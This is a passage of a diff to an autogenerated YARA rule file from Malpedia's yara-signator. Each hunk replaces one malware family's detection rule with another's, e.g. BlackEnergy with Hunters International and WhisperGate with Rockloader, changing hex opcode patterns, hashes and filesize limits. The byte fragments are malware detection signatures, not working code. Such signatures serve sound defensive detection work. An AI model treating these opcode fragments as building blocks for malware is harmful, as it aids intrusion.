+		$sequence_13 = { 52 8b01 ff5004 c645fc07 8bcf 8b5640 }
+		$sequence_14 = { 52 8b01 ff5004 c645fc06 8bcf 8b563c 83ea10 }
+		$sequence_15 = { 2b4624 83f810 7d09 51 }
+		$sequence_16 = { 3855e3 7408 8b4dd8 8b55dc eb04 8bce 33d2 }
 
 	condition:
-		7 of them and filesize < 1073152
+		7 of them and filesize < 4161536
 }
-rule MALPEDIA_Win_Dorshel_Auto : FILE
+rule MALPEDIA_Win_Lodeinfo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "550d8628-f52a-56de-91a7-ece0c38b96fb"
+		id = "2842da77-f970-52c3-8984-a714a7915a2f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dorshel_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lodeinfo_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "364203df24c6a83e17731caab6caa244bb9a531055fdc65fef6d763de8c4fb40"
+		logic_hash = "c6db0fe0e940f8fa6652bc4d77f8fe0b30871c4844a8eaef730ac89cf20d8f74"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130444,32 +130299,32 @@ rule MALPEDIA_Win_Dorshel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 83ec0c 31c0 648b5030 8b520c 8b5214 }
-		$sequence_1 = { 8d7708 8b3f 33fb f3a4 5f }
-		$sequence_2 = { 03f8 84c0 75f6 81ff5e515e83 7408 81ff36cadb30 75da }
-		$sequence_3 = { 83c004 e2f9 58 54 50 }
-		$sequence_4 = { 51 8b0f 33cb 51 ff55f8 8b5df4 }
-		$sequence_5 = { 54 50 8b4f04 33cb 51 8b0f }
-		$sequence_6 = { ffd5 85c0 74cd 8b07 01c3 }
-		$sequence_7 = { ac c1cf0d 03f8 84c0 75f6 81ff5e515e83 7408 }
-		$sequence_8 = { 57 6800200000 53 56 68129689e2 ffd5 85c0 }
-		$sequence_9 = { 5f 8b4704 33c3 83c104 99 }
+		$sequence_0 = { 85db 742a 8b4c2420 8bc3 2bcb 81f900100000 }
+		$sequence_1 = { 7418 8b4114 3b4614 753f 8b4118 3b4618 7537 }
+		$sequence_2 = { ba???????? b9???????? e8???????? 50 e8???????? 8b5c2448 83c404 }
+		$sequence_3 = { 8b8d34ffffff 8bfe c1ef03 0fafcf }
+		$sequence_4 = { 83c404 46 83fe10 75e3 5f }
+		$sequence_5 = { 8955e4 81faff000000 7756 8b55f8 8b4308 8b3a 47 }
+		$sequence_6 = { b22d e8???????? 83eb01 75f4 b22b e8???????? 50 }
+		$sequence_7 = { 23c7 03d8 895de4 8b7d0c 8bcf }
+		$sequence_8 = { 0fb65204 c1e218 d3e2 0bd3 8b5de4 eb68 c7461000000000 }
+		$sequence_9 = { 83c404 83f810 722b 8b4c242c 8d5001 8bc1 81fa00100000 }
 
 	condition:
-		7 of them and filesize < 24576
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Blackenergy_Auto : FILE
+rule MALPEDIA_Win_Hunters_International_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62fd91e5-385e-5b2b-8f41-0f60c4fa0e69"
+		id = "d8636829-de8e-581c-ad4e-c31c44dd9781"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackenergy_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunters_international"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hunters_international_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "4b4bc961d280588360830fea0a66046ffbc4c49bb89c22238ddcc6fa38fb42f9"
+		logic_hash = "9c91c92551d0b4c31eb2166ecca4cb74b9d63e524f9ede84d728adc0424bfc5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130483,32 +130338,32 @@ rule MALPEDIA_Win_Blackenergy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89430c 8bc3 5f 5b }
-		$sequence_1 = { 56 e8???????? 8bf0 85f6 7417 56 6a00 }
-		$sequence_2 = { e8???????? 85c0 0f848c130000 8945b4 8b7508 8b7d10 8b4d0c }
-		$sequence_3 = { c70200000000 8b5104 0bd2 7407 c7420800000000 5a }
-		$sequence_4 = { 49 8bc3 2bc1 40 5b 5f 8bd0 }
-		$sequence_5 = { 53 e8???????? 6a00 ffd0 8b5f3c 8365c800 }
-		$sequence_6 = { 47 38e0 74f1 3bca 7602 }
-		$sequence_7 = { ff15???????? c3 55 8bec 81ec08010000 8365fc00 57 }
-		$sequence_8 = { 83f905 770b c745f409000000 33c9 }
-		$sequence_9 = { ff75c4 51 6a00 ff7514 56 ff7508 }
+		$sequence_0 = { c641040c e9???????? c641040d e9???????? }
+		$sequence_1 = { e9???????? c641040d e9???????? c641040e e9???????? c641040f e9???????? }
+		$sequence_2 = { 241f 3c1f 750f c70100000000 c641041f }
+		$sequence_3 = { c641040c e9???????? c641040d e9???????? c641040e }
+		$sequence_4 = { c6410402 e9???????? c6410405 e9???????? c641040c e9???????? c641040d }
+		$sequence_5 = { c6410405 e9???????? c641040c e9???????? c641040d e9???????? }
+		$sequence_6 = { 750f c70100000000 c641041f c6410810 }
+		$sequence_7 = { c6410400 e9???????? c6410402 e9???????? c6410405 }
+		$sequence_8 = { c6410402 e9???????? c6410405 e9???????? }
+		$sequence_9 = { c641040c e9???????? c641040d e9???????? c641040e e9???????? }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 1377280
 }
-rule MALPEDIA_Win_Mydoom_Auto : FILE
+rule MALPEDIA_Win_Netkey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7e77b916-3ba2-5a80-a19d-24731b91f9bc"
+		id = "d0a2d0e1-28d1-5f88-b1cb-dda359954bd2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mydoom_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netkey_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "35d52ce2fd0848990f084283aa4885b799e1dbfb0fb9f161e6a1a896179d7494"
+		logic_hash = "daf69a83c7310935a12c421c94563aee301c2dd28fd19c71dd25e72dc29acd85"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130522,32 +130377,32 @@ rule MALPEDIA_Win_Mydoom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89442404 893424 e8???????? ba00000000 eb20 ba00000000 }
-		$sequence_1 = { 8d45f8 89442410 c744240c19000200 c744240800000000 895c2404 }
-		$sequence_2 = { c3 55 89e5 83ec48 895df4 8975f8 }
-		$sequence_3 = { e8???????? c78538feffff44000000 c78564feffff01000000 66c78568feffff0500 }
-		$sequence_4 = { 53 81ec94010000 c7442404???????? 8d9d38ffffff 891c24 }
-		$sequence_5 = { c7042401000080 e8???????? 83ec14 85c0 7547 893424 e8???????? }
-		$sequence_6 = { 380a 7415 42 803a00 7406 }
-		$sequence_7 = { 8d85c8fdffff 890424 e8???????? 83ec04 8b4508 890424 e8???????? }
-		$sequence_8 = { 8945cc 0fb745e6 668945ca c744240810000000 8d45c8 }
-		$sequence_9 = { 8b7508 8b5d0c 803b00 7414 0fbe03 }
+		$sequence_0 = { 8bca 0fa4c103 c1e003 03f0 13d1 0fa4f202 c1e602 }
+		$sequence_1 = { 786d 8b4d08 8bd6 e8???????? 85c0 }
+		$sequence_2 = { 83fa03 7511 8b45fc 8b0c85a8214400 8a06 }
+		$sequence_3 = { 83c40c 8d85f0dfffff 6800080000 50 6a00 56 ff15???????? }
+		$sequence_4 = { 83e10f eb02 33c9 8b450c 0fb684c8b02e4300 c1e804 }
+		$sequence_5 = { 05b0407c05 3146e8 8b4714 059ea0eb01 3146ec 8b4718 05???????? }
+		$sequence_6 = { 8b95b4efffff 46 8985f8efffff 8bc2 c1e802 40 3bf0 }
+		$sequence_7 = { e8???????? 51 e8???????? a3???????? 85c0 7974 }
+		$sequence_8 = { 8bc1 c1f806 83e13f 6bc930 8b0485a8214400 80640828fe ff36 }
+		$sequence_9 = { 3a4801 751c 83c702 83c002 84c9 75e4 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 606208
 }
-rule MALPEDIA_Win_Tigerlite_Auto : FILE
+rule MALPEDIA_Win_Nettraveler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "119827aa-8530-5cae-8d65-e56592a0b2d2"
+		id = "49924387-14f0-5a87-ae2b-48062b6b59c8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tigerlite_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nettraveler_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b688ea808508193aa1c7d4aa7527d4ad25741bc4cd2a88205c0fc518db087920"
+		logic_hash = "64cd33a7e821a03ef4cb5acc77650adcc2d4e3c4a14efecc6b33e33a7efaa84e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130561,38 +130416,32 @@ rule MALPEDIA_Win_Tigerlite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bf8 4883f8ff 7520 488d15e1c50100 488bce e8???????? }
-		$sequence_1 = { 4885c0 0f84a9010000 488bc8 ff15???????? 488d1520ad0000 }
-		$sequence_2 = { 803c0700 75f7 488d4f01 4d8bce }
-		$sequence_3 = { 2bca 8d95e0f9ffff 8d7201 8a02 42 }
-		$sequence_4 = { 50 e8???????? 83c40c c645f400 833d????????00 c745f500000000 }
-		$sequence_5 = { e8???????? 4c8d4530 8d5614 488d0defa70100 897530 e8???????? 8b5530 }
-		$sequence_6 = { ff15???????? 8bf8 e9???????? 8b8528e5ffff 8b0c85489d4100 8b8524e5ffff }
-		$sequence_7 = { 0fbec2 0fbe80d8214100 83e00f eb02 33c0 }
-		$sequence_8 = { 8d859cf2ffff 03c1 8b8d24e5ffff 50 8b8528e5ffff 8b0485489d4100 ff3401 }
-		$sequence_9 = { 50 8b0495489d4100 ff3418 ff15???????? 85c0 750a }
-		$sequence_10 = { 488bfa 488bd9 488d0549e90000 488981a0000000 83611000 }
-		$sequence_11 = { 8a06 46 88441905 8b45f4 83fa02 7c11 8b0c85489d4100 }
-		$sequence_12 = { ff742414 8b442420 03c6 57 }
-		$sequence_13 = { 785b 8bc3 2503000080 7d07 }
-		$sequence_14 = { 0fb605???????? 488bf9 88442428 e8???????? 4885c0 0f8422010000 }
-		$sequence_15 = { c3 33d2 41b800040000 488bc8 }
+		$sequence_0 = { ffd0 50 68???????? ff7510 ff15???????? ff7510 e8???????? }
+		$sequence_1 = { 5e 5d 83c440 c3 56 e8???????? e8???????? }
+		$sequence_2 = { 0bd1 0355b4 8dbc17aac7b6e9 8bd0 8bcf }
+		$sequence_3 = { aa 8bca 33c0 8dbdddefffff 80a5dcf3ffff00 f3ab }
+		$sequence_4 = { ff37 56 ff15???????? 53 ff37 56 ff15???????? }
+		$sequence_5 = { ffd6 bd???????? 8d442418 55 68???????? 50 ffd7 }
+		$sequence_6 = { 53 6a03 53 53 ff75c0 ff75b8 ff7510 }
+		$sequence_7 = { ff7508 ffd6 53 8d8590f6ffff 53 50 }
+		$sequence_8 = { 8db4850cffffff 8b4508 33d2 0fb6803c910010 8bf8 }
+		$sequence_9 = { ff75fc ff15???????? 85c0 7417 8d85f4fdffff 56 }
 
 	condition:
-		7 of them and filesize < 349184
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Narilam_Auto : FILE
+rule MALPEDIA_Win_Final1Stspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54e32c98-3d91-5f09-b5aa-2a231fe53ae4"
+		id = "6b262f1e-6f1a-5a41-853b-26929c3926c7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.narilam_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.final1stspy_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "d58f6ba2ee444c0612b61b483f3c9e07a728833887fe26863735ef4c04a1aac5"
+		logic_hash = "2890f444efdd6c719c6ff20f4502542398a3dec68f7c2fb262ec6568139d72d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130606,32 +130455,32 @@ rule MALPEDIA_Win_Narilam_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 66c785b0feffff2c03 ba???????? 8d85e0feffff e8???????? ff85bcfeffff 8d95e0feffff }
-		$sequence_1 = { e8???????? 84c0 7434 8b4370 50 8d45d0 50 }
-		$sequence_2 = { e8???????? 50 ff45d8 ba???????? 8d45f4 e8???????? ff45d8 }
-		$sequence_3 = { ff8d4cfeffff 8d8548ffffff ba02000000 e8???????? 66c78540feffff0c02 ba???????? 8d8544ffffff }
-		$sequence_4 = { 8d850cffffff ba02000000 e8???????? 66c785b0feffffb402 ba???????? 8d8508ffffff e8???????? }
-		$sequence_5 = { 6683f822 7407 8bc3 e8???????? 5b c3 80b8ec01000001 }
-		$sequence_6 = { e8???????? ff4df8 ff4df8 6a00 68???????? e8???????? }
-		$sequence_7 = { e8???????? 8b500c 8d45f8 e8???????? 8b45f8 50 8b8378010000 }
-		$sequence_8 = { ff8de8feffff 8d45cc ba02000000 e8???????? 66c785dcfeffff7400 ba???????? 8d45c8 }
-		$sequence_9 = { 7506 803f00 7401 47 8b4508 8978fc 5f }
+		$sequence_0 = { 80c27a 80f219 881439 41 3bce 7cef 8bc7 }
+		$sequence_1 = { 8bd6 0f281d???????? 2bd0 0f10040f 0f28ca 660ffcc2 }
+		$sequence_2 = { 8a4803 c1e206 80f93d 7508 47 83ff03 }
+		$sequence_3 = { 5d c3 2d???????? 78b0 03d0 8b45fc 8a4803 }
+		$sequence_4 = { 7508 47 83ff03 7d3e }
+		$sequence_5 = { 7410 8a11 8acb 3aca }
+		$sequence_6 = { 81e7ff070080 7908 4f 81cf00f8ffff }
+		$sequence_7 = { 81cf00f8ffff 47 33f6 85ff 7e0a e8???????? }
+		$sequence_8 = { 84db 7410 8a11 8acb 3aca 7425 8a4801 }
+		$sequence_9 = { c3 2d???????? 78dc 8b55fc b9???????? }
 
 	condition:
-		7 of them and filesize < 3325952
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Scanline_Auto : FILE
+rule MALPEDIA_Win_Blackmatter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a94c58f-9a04-5a8f-a52b-c8922aabd872"
+		id = "f72bfe88-212a-5b08-bbca-50aa064e9cc7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanline"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scanline_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackmatter_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "ae2af87b82d9394b37c14ff046f7786f58d075866fa464adcdf96cb76e14a4ba"
+		logic_hash = "e535a5032543c492ff373af34088a44c3884afdd41efbf279f3f7738c128e9a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130645,32 +130494,32 @@ rule MALPEDIA_Win_Scanline_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7404 8b400c c3 33c0 c3 83611000 c3 }
-		$sequence_1 = { 740e 53 8bc8 ff742414 e8???????? eb02 }
-		$sequence_2 = { 8bd8 85db 743d 6800040000 8d4608 ff7508 }
-		$sequence_3 = { 7434 6a10 e8???????? 3bc3 59 740e 53 }
-		$sequence_4 = { 750f 83f81f 730a 885c0438 8a1f 40 }
-		$sequence_5 = { 7e10 894608 c1e003 50 e8???????? 59 894604 }
-		$sequence_6 = { 59 59 8b45fc a3???????? e9???????? c705????????01000000 e9???????? }
-		$sequence_7 = { 8bc8 c1e103 8bd1 89460c 33c0 c1e902 }
-		$sequence_8 = { 51 bbffff0000 6806100000 53 50 ffd7 8d8608050000 }
-		$sequence_9 = { 8b4e18 50 e8???????? 6a24 e8???????? 8bf8 59 }
+		$sequence_0 = { ff15???????? ebe7 837dd400 7408 ff75d4 }
+		$sequence_1 = { 807eff2e 7502 eb02 eb05 }
+		$sequence_2 = { 8d45f4 50 ff15???????? 83c40c 6a0a }
+		$sequence_3 = { 0f858c000000 83bdacfdffff00 7509 83bdb0fdffff00 747a }
+		$sequence_4 = { 740e ff75f0 ff15???????? 5b 8be5 }
+		$sequence_5 = { ff15???????? 85c0 753a 64813d34000000b7000000 }
+		$sequence_6 = { c745f000000000 ff7508 ff15???????? 83c404 85c0 0f848a010000 }
+		$sequence_7 = { 66ab 648b1d30000000 ff731c ff15???????? 8b7310 8d4638 ff35???????? }
+		$sequence_8 = { 85f6 745e 687c010000 56 ff75e8 ff15???????? }
+		$sequence_9 = { 85c0 7510 807eff2d 7406 807eff2e 7502 eb02 }
 
 	condition:
-		7 of them and filesize < 151552
+		7 of them and filesize < 194560
 }
-rule MALPEDIA_Win_Cmsbrute_Auto : FILE
+rule MALPEDIA_Win_Sombrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "238a708e-338b-5ab5-8256-9ba00c6b30fb"
+		id = "d0dde23d-377f-5d10-8911-6d96e1813650"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cmsbrute_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sombrat_auto.yar#L1-L152"
 		license_url = "N/A"
-		logic_hash = "634330623f3144af6ff0dc1b30b95f2861c0e95f174875a559bba752af7efe44"
+		logic_hash = "941d1381587fea594c21f438f9e9d8395ac2ab22b349124a0b48a1b28fcdbcbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130684,34 +130533,40 @@ rule MALPEDIA_Win_Cmsbrute_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d1 c1e91f c1e81f 22c1 8bd6 8d4eff c1e91f }
-		$sequence_1 = { ffb57cfeffff 83c01c 50 e8???????? 83c40c 85c0 7d0f }
-		$sequence_2 = { e9???????? 8b8780000000 8b7758 81c60c010000 8945d4 3bc3 7505 }
-		$sequence_3 = { ebad 85f6 7466 8b5d0c 8b03 85c0 7407 }
-		$sequence_4 = { ff0e 8b06 85c0 7f3b 7426 68ed010000 bf???????? }
-		$sequence_5 = { f645ff40 7412 8b87c0000000 3b86e0000000 0f85bbfeffff 33c0 40 }
-		$sequence_6 = { c3 80f92b 740d 80f92d 7408 84c9 74e4 }
-		$sequence_7 = { ffb7f8000000 83c620 ff76e8 c1e003 56 57 50 }
-		$sequence_8 = { ff4df4 3975dc 7461 c745f001000000 85f6 7456 ff75cc }
-		$sequence_9 = { 8b07 59 8983d8040000 e9???????? ff36 8db334040000 e9???????? }
+		$sequence_0 = { 014114 8b7508 837df800 8b5df4 0f84c3feffff }
+		$sequence_1 = { 833d????????10 b9???????? 0f430d???????? 51 8bc8 }
+		$sequence_2 = { 01041e 8b4508 42 8d7308 }
+		$sequence_3 = { 0145e4 8b55f8 83c40c 294644 }
+		$sequence_4 = { 014620 f6460c04 8945e0 742d 85c0 7429 8b4de4 }
+		$sequence_5 = { 0000 e8???????? c70424???????? 8d5f0c 68???????? }
+		$sequence_6 = { 014620 ff36 114e24 8b442434 }
+		$sequence_7 = { 0144244a 894e0c ffb72c010000 ff15???????? }
+		$sequence_8 = { 016b08 33c0 e9???????? 33ff }
+		$sequence_9 = { 01448c20 48ffc1 493bc9 7cf1 }
+		$sequence_10 = { 016b08 488d05dc980500 41b9e7160000 4889442420 }
+		$sequence_11 = { 015f08 33c0 e9???????? 488b4760 }
+		$sequence_12 = { 0145f1 4533c9 4533c0 488b16 }
+		$sequence_13 = { 015f08 488bcf e8???????? 8bf0 }
+		$sequence_14 = { 015f08 33c0 488b4c2470 4833cc }
+		$sequence_15 = { 015f08 83bfd800000016 0f856c020000 488b87c8000000 }
 
 	condition:
-		7 of them and filesize < 5275648
+		7 of them and filesize < 1466368
 }
-rule MALPEDIA_Win_Whispergate_Auto : FILE
+rule MALPEDIA_Win_Rockloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9dc05d10-b36b-5ddc-8d53-1a84a19c9fff"
+		id = "104e8d35-82fc-516a-9593-bcf9bbbb834c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whispergate_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rockloader_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "f1a5fde20ead0d040272e28cb5dd9257a9305ae69c007901daa130bb710a267b"
+		logic_hash = "64906b80f87c45698d39208b0d7a3080387e28b93568b203b7e0595d5362c76c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -130723,32 +130578,32 @@ rule MALPEDIA_Win_Whispergate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 89f4 0f841bffffff 8b5508 85d2 0f8410ffffff 8b5508 }
-		$sequence_1 = { 83f801 0f8543010000 83c30c 81fb???????? 0f8389000000 8b13 8b7b04 }
-		$sequence_2 = { 83c301 ebe1 83c301 ebe3 8d6b01 e9???????? }
-		$sequence_3 = { b8???????? c705????????01000000 2d???????? 83f807 7ee0 57 }
-		$sequence_4 = { 53 83ec4c f605????????02 0f84ea020000 e8???????? 8965c4 }
-		$sequence_5 = { 84d2 7906 81cf00ffffff 29f7 8d54241c }
-		$sequence_6 = { c1e004 e8???????? 8b4de0 29c4 }
-		$sequence_7 = { 83f802 89c1 7417 8d65f4 89c8 5b }
-		$sequence_8 = { 5e c3 31d2 89d0 c3 }
-		$sequence_9 = { c706???????? 893424 8b4d10 89fa 89d8 e8???????? }
+		$sequence_0 = { dc4dec 83650800 dec9 dd5dec dd45ec dd5918 9b }
+		$sequence_1 = { 40 8a0c30 3acb 75f3 8a0c30 3acb 7413 }
+		$sequence_2 = { c3 80f961 7c0d 80f966 7f08 0fbec9 8d44c1a9 }
+		$sequence_3 = { c0e204 240f 02d0 8817 }
+		$sequence_4 = { 80383a 75b7 40 e8???????? 50 }
+		$sequence_5 = { 46 80382d 750a dd05???????? 40 dd5de4 }
+		$sequence_6 = { 7f09 0fbec9 8d44c1d0 eb24 80f941 7c0e 80f946 }
+		$sequence_7 = { 5d c20400 e8???????? 85c0 7407 c7400c05000000 c3 }
+		$sequence_8 = { 6a02 58 e8???????? 8bf8 85ff 0f84a9feffff 837d1000 }
+		$sequence_9 = { 48 746a 48 744e }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Industroyer2_Auto : FILE
+rule MALPEDIA_Win_Lynx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e868bea-ed7e-5974-96ba-660ba0f6c883"
+		id = "f38e4f00-aaca-5bf9-869c-83083f4fee5c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.industroyer2_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lynx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lynx_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "af4403ef973a2e44095a1be12f63d921343b5d2fe519fbae198aa69e0c4340cd"
+		logic_hash = "830d0c044d086e873e93b41654d3296d5d83edd7251c856a6c1b1da8daa3d504"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130762,32 +130617,32 @@ rule MALPEDIA_Win_Industroyer2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4dfc 8b11 c6420603 8b45fc 8b08 c6410783 8b55fc }
-		$sequence_1 = { ebcc 8b4508 8b8848010100 8b55f4 }
-		$sequence_2 = { 894a0c 8b55f8 8b02 8b4d20 8b5108 895008 8b45f8 }
-		$sequence_3 = { 8b4508 8945fc 8b4d0c 894df8 837d0800 7414 }
-		$sequence_4 = { e8???????? 83c404 85c0 7636 68???????? 8b4508 }
-		$sequence_5 = { 52 e8???????? 8b4508 83780800 }
-		$sequence_6 = { 694d18a0860100 034d1c 8b55fc 894a14 8b45fc 8be5 }
-		$sequence_7 = { 50 e8???????? 8b4dec 894110 8b55fc 83c201 8955fc }
-		$sequence_8 = { a1???????? 8945e0 8b0d???????? 894de4 8a15???????? 8855e8 8d45d8 }
-		$sequence_9 = { e9???????? 68???????? e8???????? 50 e8???????? 83c408 6a08 }
+		$sequence_0 = { 8d4dec 0f1145ec e8???????? b90f000000 8d87bf000000 }
+		$sequence_1 = { 23d1 8b7df4 8bde 8955dc 81f3ffffff03 8b55f0 f7d3 }
+		$sequence_2 = { 038580fcffff 038574fdffff 898548fdffff 8d0433 898528fdffff 8b8558fdffff }
+		$sequence_3 = { e9???????? 83bb6801000000 8b4320 894308 8b4324 c7433400000000 89430c }
+		$sequence_4 = { 8d4010 83fa0a 72dc 8b8d0cffffff 2b0f 8b8510ffffff 1b4704 }
+		$sequence_5 = { ff15???????? 50 ff15???????? 85c0 0f84db000000 8b5dc0 }
+		$sequence_6 = { 41 81f901010000 7ced 8a8619834200 88843319010000 46 81fe00010000 }
+		$sequence_7 = { 89957cfcffff 899578fcffff 899de4fcffff 81bd3cfdffff80020000 8bbd1cfdffff 89b5e8fcffff 8bb538fdffff }
+		$sequence_8 = { c1e10e 0b8d28fdffff 318d68fdffff 8b8d74fcffff c1e112 0b8d24fdffff }
+		$sequence_9 = { ff750c 57 6a01 53 ff15???????? 50 53 }
 
 	condition:
-		7 of them and filesize < 100352
+		7 of them and filesize < 363520
 }
-rule MALPEDIA_Win_Smarteyes_Auto : FILE
+rule MALPEDIA_Win_Lambload_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8abe8c6c-e31a-5eb9-813d-c2cddefb10f7"
+		id = "ceafeacb-8aed-52b1-8cc4-bc13d9e4ebc5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
